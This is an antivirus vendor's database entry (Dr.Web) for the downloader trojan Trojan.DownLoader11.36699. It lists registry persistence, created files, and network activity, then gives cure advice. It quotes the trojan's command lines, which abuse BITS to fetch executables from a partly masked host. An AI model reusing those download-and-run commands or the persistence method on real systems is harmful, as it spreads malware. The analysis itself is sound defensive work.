Підтримка
Цілодобова підтримка | Правила звернення

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Поширені запитання |  Форум |  Бот самопідтримки Telegram

Ваші запити

  • Всі: -
  • Незакриті: -
  • Останій: -

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Зв'яжіться з нами Незакриті запити: 

Профіль

Профіль

Trojan.DownLoader11.36699

Добавлен в вирусную базу Dr.Web: 2014-10-11

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] 'wextract_cleanup0' = 'rundll32.exe <SYSTEM32>\advpack.dll,DelNodeRunDLL32 "%TEMP%\IXP000.TMP\"'
Создает следующие сервисы:
  • [<HKLM>\SYSTEM\ControlSet001\Services\BITS] 'Start' = '00000002'
Вредоносные функции:
Создает и запускает на исполнение:
  • 'C:\Iexplor701.exe'
  • 'C:\Iexplor171.exe'
  • 'C:\apnet.exe'
  • '%TEMP%\IXP000.TMP\lsass.exe' /transfer jman /download /priority high http://bi####r.fileave.com/beam/apnet.exe "C:\apnet.exe"
  • '%TEMP%\IXP000.TMP\lsass.exe' /transfer jman /download /priority high http://bi####r.fileave.com/IC/zhvntnlgecngmdn.exe "C:\Iexplor701.exe"
  • '%TEMP%\IXP000.TMP\Picture Resize.exe'
  • '%TEMP%\IXP000.TMP\lsass.exe' /transfer jman /download /priority high http://bi####r.fileave.com/bucks/58d3c.exe "C:\Iexplor171.exe"
  • 'C:\apnet.exe' (загружен из сети Интернет)
  • 'C:\Iexplor701.exe' (загружен из сети Интернет)
  • 'C:\Iexplor171.exe' (загружен из сети Интернет)
Запускает на исполнение:
  • '<SYSTEM32>\net1.exe' start bits
  • '<SYSTEM32>\ntvdm.exe' -f -i1
Изменения в файловой системе:
Создает следующие файлы:
  • %APPDATA%\Thinstall\Picture Resize 5.5.19\Registry.tvr.backup.b50
  • %APPDATA%\Thinstall\Picture Resize 5.5.19\Registry.rw.tvr.tmp-b54b54
  • C:\BIT5.tmp
  • C:\BIT4.tmp
  • C:\BIT3.tmp
  • %APPDATA%\Thinstall\Picture Resize 5.5.19\Registry.rw.lck.CRNJEUFU.ffffffffb54
  • %TEMP%\IXP000.TMP\r.bat
  • %TEMP%\IXP000.TMP\w.bat
  • %TEMP%\IXP000.TMP\lsass
  • %WINDIR%\Temp\scs2.tmp
  • %WINDIR%\Temp\scs1.tmp
  • %TEMP%\IXP000.TMP\Picture Resize.exe
Удаляет следующие файлы:
  • %TEMP%\IXP000.TMP\w.bat
  • %TEMP%\IXP000.TMP\lsass.exe
  • %TEMP%\IXP000.TMP\r.bat
  • %WINDIR%\Temp\scs1.tmp
  • %WINDIR%\Temp\scs2.tmp
Перемещает следующие файлы:
  • C:\BIT3.tmp в C:\Iexplor701.exe
  • C:\BIT4.tmp в C:\Iexplor171.exe
  • C:\BIT5.tmp в C:\apnet.exe
  • %APPDATA%\Thinstall\Picture Resize 5.5.19\Registry.tvr.backup.b50 в %APPDATA%\Thinstall\Picture Resize 5.5.19\Registry.tvr.backup
  • %TEMP%\IXP000.TMP\lsass в %TEMP%\IXP000.TMP\lsass.exe
  • %APPDATA%\Thinstall\Picture Resize 5.5.19\Registry.rw.lck.CRNJEUFU.ffffffffb54 в %APPDATA%\Thinstall\Picture Resize 5.5.19\Registry.rw.lck
  • %APPDATA%\Thinstall\Picture Resize 5.5.19\Registry.rw.tvr.tmp-b54b54 в %APPDATA%\Thinstall\Picture Resize 5.5.19\Registry.rw.tvr
Сетевая активность:
Подключается к:
  • 'localhost':1042
  • 'localhost':1043
  • 'bi####r.fileave.com':80
  • 'wp#d':80
  • 'localhost':1040
TCP:
Запросы HTTP GET:
  • bi####r.fileave.com/bucks/58d3c.exe
  • bi####r.fileave.com/beam/apnet.exe
  • wp#d/wpad.dat
  • bi####r.fileave.com/IC/zhvntnlgecngmdn.exe
UDP:
  • DNS ASK bi####r.fileave.com
  • DNS ASK wp#d
Другое:
Ищет следующие окна:
  • ClassName: 'Shell_TrayWnd' WindowName: ''
  • ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-b34.b38.380001'

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке